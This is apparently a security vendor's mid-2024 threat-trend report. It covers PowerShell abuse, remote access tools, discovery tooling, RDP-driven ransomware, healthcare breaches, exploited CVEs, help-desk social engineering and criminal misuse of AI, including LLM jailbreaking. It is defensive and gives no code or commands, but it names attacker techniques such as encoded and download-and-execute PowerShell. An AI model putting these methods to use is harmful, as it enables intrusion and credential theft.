First-Half Threat Trends of
2024
Insights into emerging threats alongside ready-to-deploy detections
The Forge ensures that our Armory—our repository of advanced detection rules—is continuously updated with the latest adversarial techniques. These detections are made available on our Anvilogic Forge GitHub repository to foster community engagement and shared learning with ready-to-deploy content. Our Anvilogic Platform Armory has enhanced the rich metadata to help users elevate their content development capabilities.
The purpose of the Armory and the GitHub repository is to empower security practitioners with actionable intelligence and detection capabilities. We enable a more comprehensive defensive posture by focusing on the sequence of actions necessary for an attacker’s objective rather than isolated attack components. Our repository includes many threat detection use cases formatted in SPL, SQL, and soon KQL to address common exploitation techniques. This initiative is part of our commitment to fostering a collaborative and safer digital environment.
This report highlights key threat trends observed in the first half of the year, focusing on the pervasive use of PowerShell in cyberattacks, the rise of remote access tools, the exploitation of external discovery tools, and sophisticated social engineering tactics. Alongside each threat, we provide ready-to-use detection rules, guides, and documentation in the repository to help you understand each detection's purpose, scope, and implementation.
Here are the top areas of focus in the first half of 2024:
Forging Ahead: Navigating the Evolving Cyber Threat Landscape This Year
Command and Scripting Interpreter: PowerShell (T1059.001)
PowerShell remains a favored tool among cybercriminals due to its high versatility and utility. Ranking consistently as a top attack technique, this powerful command and scripting interpreter enables threat actors to execute a range of commands that can download files, manipulate system settings, and run complex scripts relatively easily. Its integration with the Windows operating system and extensive capabilities make it an ideal choice for both system administrators and attackers alike. Through the first half of 2024, numerous cyber incidents have highlighted using PowerShell executions throughout the attack chain to facilitate their intrusions.
PowerShell has become an integral tool for adversaries due to its flexibility, deep integration with the Windows operating system, and the rise in the use of living-off-the-land Binaries (LOLBins). Attackers frequently use PowerShell to download additional payloads by leveraging commands like Invoke-Expression or the DownloadFile parameter. These methods allow adversaries to execute code or retrieve malicious files from the internet, thus expanding their attack arsenal and proceeding further in their intrusion.
Adversaries can also employ encoded commands to obfuscate their activities, making detection more challenging. This technique involves converting PowerShell scripts into encoded formats that can evade simple signature-based detection mechanisms. The use of the EncodedCommand parameter is particularly prevalent, enabling attackers to hide the true intent of their scripts. PowerShell scripts are also commonly used for a variety of malicious purposes. For instance, scripts may be designed to harvest credentials, manipulate registry settings, or establish backdoors.
Understanding these specific uses of PowerShell is for detection engineers. Implementing detections for common PowerShell abuse patterns, such as monitoring for Invoke-Expression and DownloadFile usage, detecting encoded commands, and scrutinizing script execution behaviors, can enhance an organization’s defensive posture. Detection engineers can develop more targeted and effective defenses against trending PowerShell-based attacks by focusing on these techniques. One of the most significant examples of detecting PowerShell should be credited to Red Canary for its identification of various suspicious PowerShell executions, enabling the prevention of a ransomware attack against a healthcare entity.
Trending techniques with actionable detections
Association
Remote Access Software (T1219)
Threat actors have been using remote access tools (RATs) extensively in the first half of 2024. These tools enable attackers to gain remote access to compromised systems and establish persistent footholds within target networks. Delivery methods often involve initial social engineering tactics, such as phishing campaigns that trick victims into downloading the software, typically under the guise of legitimate help desk or support services.
This year's notable development has been exploiting a vulnerability in ConnectWise ScreenConnect (CVE-2024-1709), allowing authentication bypass. Ransomware gangs, including Black Basta, Bl00dy, LockBit, and Play have actively exploited this vulnerability. Remote access software is also frequently used in attacks to enhance an attacker's control and persistence within a compromised system or network. Commonly observed remote access tools include AnyDesk and ScreenConnect, which are often leveraged due to their popularity and robust functionalities. By exploiting these tools, attackers can remotely control victim machines, exfiltrate sensitive data, and deploy additional malware, all while maintaining a low profile and evading detection.
Trending techniques with actionable detections
Threat actor associations
Ransomware gang associations
Usage of External Third-Party Tools for Discovery
Similar to remote access software, the importance of an asset and software inventory is monitoring the usage of thorough and potentially dangerous tools used for network and system discovery by adversaries to understand pathways in the network.
Threat actors have increasingly turned to external third-party tools for discovery purposes, aiding in host and domain reconnaissance activities. Tools such as AdFind, Advanced IP Scanner, SoftPerfect Network Scanner, and PowerShell custom modules like Invoke-ShareFinder are crucial in facilitating threat actors' ability to navigate their intrusion. These tools, which are not native to the Windows operating system, have been widely used to gather information about network topology, Active Directory structures, and connected devices.
Adopting these tools allows attackers to efficiently map out target environments and identify potential weaknesses that can be exploited in subsequent stages of their attacks. This trend emphasizes the need for comprehensive network monitoring and the importance of detecting unauthorized use of such tools to mitigate the risks associated with their abuse and better protect their networks.
Trending techniques with actionable detections
Threat actor associations
Ransomware gang associations
Threat Scenarios for Trending Threats
Monitoring Identity Providers (IdPs) is crucial, with Okta continually warning of rising attacks. Advisories from Okta highlighted a spike in credential stuffing attacks from April 19, 2024, to April 26, 2024, with attackers using residential proxies to obscure their activities. This spike aligns with observations from Duo Security and Cisco Talos, noting increased attacks from March 18 to April 26, 2024. Additionally, credential stuffing attacks targeting Okta's Cross-Origin Resource Sharing (CORS) feature have increased since April 15, 2024, primarily targeting endpoints that facilitate cross-origin authentication.
Put telemetry together to identify sequences of threat activity. Monitoring of social engineering attacks centered on the compromise of Okta credentials, monitor logon events from suspicious sources, and detect techniques indicative of MFA bypass leading to unauthorized account usage.
Sequence threat techniques for Anvilogic customers
Compromised RDP credentials can enable a critical series of events, allowing threat actors to advance their intrusion on a compromised network. As demonstrated by ransomware operators Akira, BianLian, and Phobos, gaining access through RDP can lead to extensive system tampering, data exfiltration, and persistence. For instance, BianLian operators often purchase compromised credentials from initial access brokers and use RDP to establish footholds, disable security services using LOLBins like PowerShell, and deploy custom implants for command and control. They further leverage tools like Advanced Port Scanner and SoftPerfect Network Scanner for system discovery and exfiltrate data using Rclone and FTP, causing severe disruptions to the victim's network.
Similarly, Phobos ransomware actors exploit vulnerable RDP ports to gain initial access, followed by deploying executables for privilege escalation and maintaining persistence. They utilize tools such as Smokeloader and Cobalt Strike for reconnaissance and bypassing network defenses. Akira ransomware operators also exploit RDP, often alongside phishing and VPN vulnerabilities, to establish persistence and disable security solutions using techniques like Bring Your Own Vulnerable Driver (BYOVD). They exfiltrate data using tools like FileZilla and WinSCP before deploying their encryptors. These examples underscore the need for robust security practices, such as multi-factor authentication and regular monitoring of RDP activity, to prevent such intrusions and protect organizational networks.
Sequence threat techniques for Anvilogic customers
Most Heavily Impacted Industry: Healthcare
In February 2024, Change Healthcare, a subsidiary of UnitedHealth, experienced a data breach. UnitedHealth CEO Andrew Witty revealed in his testimony that compromised credentials were used to access Change Healthcare’s Citrix portal, which lacked multifactor authentication. This security lapse allowed the ALPHV/BlackCat ransomware group to deploy ransomware and exfiltrate data, resulting in severe operational disruptions and financial losses estimated at $872 million. Witty’s testimony detailed the hardships caused by the ransomware attack, disrupting operations across the healthcare sector, from pharmacists having to manually submit claims to rural family medicine practices struggling to meet payroll. The breach was initially detected on February 12 when unauthorized access was gained through stolen employee credentials, escalating on February 21 with the deployment of ransomware. Despite a ransom payment of $22 million to protect sensitive data, the full scope of the breach remains under investigation, particularly concerning patient and provider data. Recovery efforts have included significant IT overhauls, such as replacing thousands of laptops and rebuilding data networks.
More recently, in May 2024, Ascension's healthcare network suffered extensive disruption due to a cyberattack, with recovery efforts ongoing. Nurses from Ascension hospitals nationwide, particularly at Providence Rochester Hospital in Michigan, reported severe impacts on patient safety due to the lack of access to electronic health records (EHRs). Forced to revert to paper records and manual operations, medical staff faced increased risks of errors and overwhelming workloads. The cyberattack hindered access to critical patient information and slowed down response times for lab results and essential medical procedures. The immediate effect on hospital operations was severe, with delays in urgent lab tests crucial for timely medical decisions. The nurses' union, Local 40, has voiced urgent concerns and put forth demands to mitigate the impact, including daily unit shift huddles, regular training sessions, weekly progress reports, and maintaining a maximum nurse-to-patient ratio of 4:1. The union also called for a temporary reduction in elective surgeries and non-emergent admissions to manage the current strain on resources more effectively.
The U.S. Department of Health and Human Services (HHS) issued a warning in April 2024 about an increase in social engineering attacks targeting IT help desks within the Healthcare and Public Health (HPH) sector. These attacks have succeeded due to the attackers' preparation, including ensuring calls originate from local area codes and using stolen personal details. The attackers have shown a preference for targeting employees in financial positions within healthcare organizations, using the guise of needing help with broken phones to request the enrollment of new devices for MFA. The HHS advisory is in line with the trends of social engineering attacks, but also the escalation of innovation in the use of social engineering, particularly aided through AI and AI voice cloning technology in these scams, making it increasingly challenging to verify the identity of callers remotely.
Vulnerabilities and Exploits Continue to Rise
One of the largest and most significant vulnerabilities this year was Ivanti vulnerabilities with its Connect Secure VPNs. The main vulnerabilities involved the exploitation of CVE-2023-46805 and CVE-2024-21887, enabling unauthenticated remote code execution and command injection, respectively, which has led to significant breaches, notably MITRE’s Networked Experimentation, Research, and Virtualization Environment (NERVE) network. Mandiant and Volexity reported that these vulnerabilities have been actively exploited by threat actors identified as UNC5221 and UTA0178, respectively. These actors demonstrated advanced tactics, including credential harvesting, lateral movement, and deploying webshells for persistent access.
Palo Alto Networks' GlobalProtect firewall devices dealt with a command injection vulnerability, CVE-2024-3400, rated with a maximum CVSS score of 10, enabling unauthenticated remote code execution on various versions of PAN-OS firewalls. Volexity researchers reported that a group tracked as UTA0218 exploited this vulnerability to execute arbitrary commands remotely on affected devices. Post-exploitation activities included the installation of a custom Python backdoor named UPSTYLE, enabling further malicious operations and lateral movement within victim networks. The attackers quickly moved through victims’ networks, extracting sensitive credentials and configuration data, highlighting the critical need for organizations to apply the released hotfixes promptly to mitigate this vulnerability.
Cisco Talos reported on the ArcaneDoor cyber-espionage campaign, exploiting two zero-day vulnerabilities in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) firewalls. These vulnerabilities, CVE-2024-20353 and CVE-2024-20359, allowed for denial of service and persistent local code execution. The state-backed group UAT4356, also known as STORM-1849 by Microsoft, exploited these vulnerabilities to compromise government networks globally, emphasizing the critical importance of patching and enhancing defense mechanisms for these devices.
These vulnerabilities highlight the urgent need for organizations to patch promptly and recognize the importance of a comprehensive detection engineering strategy. Focusing solely on specific zero-day CVEs is insufficient due to the rapid pace of vulnerability disclosures and the fact that adversaries can exploit vulnerabilities long before they are made public. Defenders should pay attention to the entire attack chain, understanding the sequence of activities that follow initial exploitation. Threat actors run their playbooks, conducting a series of actions to achieve their objectives. By focusing on common protocols and techniques used by attackers and by detecting their activities throughout the attack chain, we can develop more effective defenses. This approach enhances our ability to detect and respond to a broader range of threats, yielding detections that address the core TTPs of attackers rather than a singular exploitation method.
Strengthen Security Essentials to Better Combat AI Threats
Monitoring the abuse of large language models (LLMs) like ChatGPT by cybercriminals, Trend Micro reports a lag in AI adoption among criminals compared to mainstream industry usage. However, there has been a shift from attempts to develop proprietary criminal LLMs to manipulating existing ones through jailbreak techniques. Criminals are utilizing AI to streamline malware development and amplify the effectiveness of their social engineering tactics. These uses leverage AI's power to craft more convincing phishing campaigns and scam communications, often involving improved translations to break language barriers and target a broader victim base.
OpenAI, in collaboration with Microsoft Threat Intelligence, has taken action against five state-affiliated threat actors who attempted to exploit AI services for malicious cyber activities. These actors, including Charcoal Typhoon and Salmon Typhoon from China, Crimson Sandstorm from Iran, Emerald Sleet from North Korea, and Forest Blizzard from Russia, had their associated OpenAI accounts terminated. The activities of these threat actors ranged from researching companies and cybersecurity tools to generating content for phishing campaigns and understanding malware evasion techniques.
Microsoft's detailed investigation into these actors revealed specific behaviors aligned with their broader cyber espionage and operational goals. For instance, Forest Blizzard focused on researching satellite communication protocols and radar imaging technology, which may have applications in military operations. Emerald Sleet's activities included identifying defense experts and organizations, understanding vulnerabilities, and drafting phishing content. Crimson Sandstorm used AI services for app and web development support, content generation for spear-phishing campaigns, and malware evasion research.
Before AI-enhanced cyberattacks become widespread, defenders should focus on reinforcing basic security measures such as regular patching, MFA, and employee training on recognizing social engineering scams. By strengthening these foundational elements, organizations can better prepare for future challenges posed by AI-enhanced cyber threats, effectively using the time while cybercriminals are still experimenting with this new vector.
A Crucial Time for Improving Cyber Defense Strategies
Maintaining a strong security posture will safeguard operations and data from persistent threats. Staying informed with Anvilogic Forge will enable organizations to stay up-to-date with the latest developments in the cyber landscape and immediately operationalize intelligence with detection content.
The first half of 2024 has showcased the relentless evolution of cyberthreats, revealing both the ingenuity and persistence of adversaries. From the adept use of PowerShell and remote access software to manipulating external third-party tools, threat actors continuously enhance their methods to breach systems. Social engineering remains a widespread tactic, with attackers targeting help desks and using stolen credentials to circumvent security defenses. The healthcare sector, in particular, has faced significant challenges, with severe breaches disrupting patient care and hospital operations.
2024 Mid-Year Attack Trends and AI Insights
About the Forge Author
Before Anvilogic, Kevin was a cybersecurity analyst at a financial institution, serving roles in digital forensics, cybersecurity operations, and detection engineering. Kevin currently resides in Albany, NY. He holds a Bachelor's degree in Information Management and Technology from Syracuse University with a concentration in Information Security. Kevin has several cybersecurity certifications with GIAC and MITRE ATT&CK.
Happy to connect with you on LinkedIn!
References
- Action Network: URGENT! Ascension Providence Rochester Medical Professionals' Demand Safety Precautions in Hospital Amid Cyber Attack
- CISA: #StopRansomware: Akira Ransomware
- CISA: #StopRansomware: BianLian Ransomware Group
- CISA: #StopRansomware: Phobos Ransomware
- Cisco Talos: ArcaneDoor - New espionage-focused campaign found targeting perimeter network devices
- CNN: It’s putting patients’ lives in danger’: Nurses say ransomware attack is stressing hospital operations
- Ivanti: CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection) for Ivanti Connect Secure and Ivanti Policy Secure Gateways
- Health Sector Cyber Coordination Center: Social Engineering Attacks Targeting IT Help Desks in the Health Sector
- Microsoft: Staying ahead of threat actors in the age of AI
- Palo Alto Networks Unit 42: Threat Brief: Operation MidnightEclipse, Post-Exploitation Activity Related to CVE-2024-3400
- Reuters: FBI says Chinese hackers preparing to attack US infrastructure
- The Record: Any number given of Volt Typhoon victims ‘likely an underestimate,’ CISA says
- Trend Micro: An Update on How Cybercriminals Are Using GenAI
- Volexity: Active Exploitation of Two Zero-Day Vulnerabilities in Ivanti Connect Secure VPN
- Volexity: Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)
.svg)
Social Engineering Menace
Scattered Spider specifically targets IT support personnel with broad access, occasionally using threats against employees to coerce the surrender of corporate credentials. Their ability to gain a comprehensive understanding of their targets’ environments underscores their advanced social engineering techniques. Octo Tempest's proficiency is further demonstrated by manipulating privileged users and post-exploitation activities. Through extensive research into organizational systems, IT processes, and VPN architectures, they gain crucial insights for orchestrating their attacks. This deep understanding allows them to exploit organizational weaknesses effectively.
Similarly, Muddled Libra’s strategy includes compromising technology administrator accounts through refined help desk social engineering tactics. Their extensive research into applications and cloud service providers the organization uses enables them to escalate privileges and expand their attack surface. Muddled Libra's ability to manipulate and navigate through an organization’s Okta Identity Portal highlights its sophisticated approach to accessing and potentially manipulating sensitive data.
Additionally, in April 2024, the U.S. Department of Health and Human Services (HHS) issued a warning about an increase in social engineering attacks targeting IT help desks in the Healthcare and Public Health (HPH) sector. Attackers posing as hospital staff have attempted to bypass MFA by persuading help desks to enroll new devices using stolen personal details, such as Social Security numbers or corporate ID numbers, to gain unauthorized access to internal systems.
Understanding these social engineering tactics and the methods used by these threat actors is crucial for organizations to implement effective defenses. Comprehensive training for IT support staff, robust verification processes for sensitive requests, and enhanced monitoring of help desk activities are essential measures to mitigate the risks associated with these advanced social engineering attacks.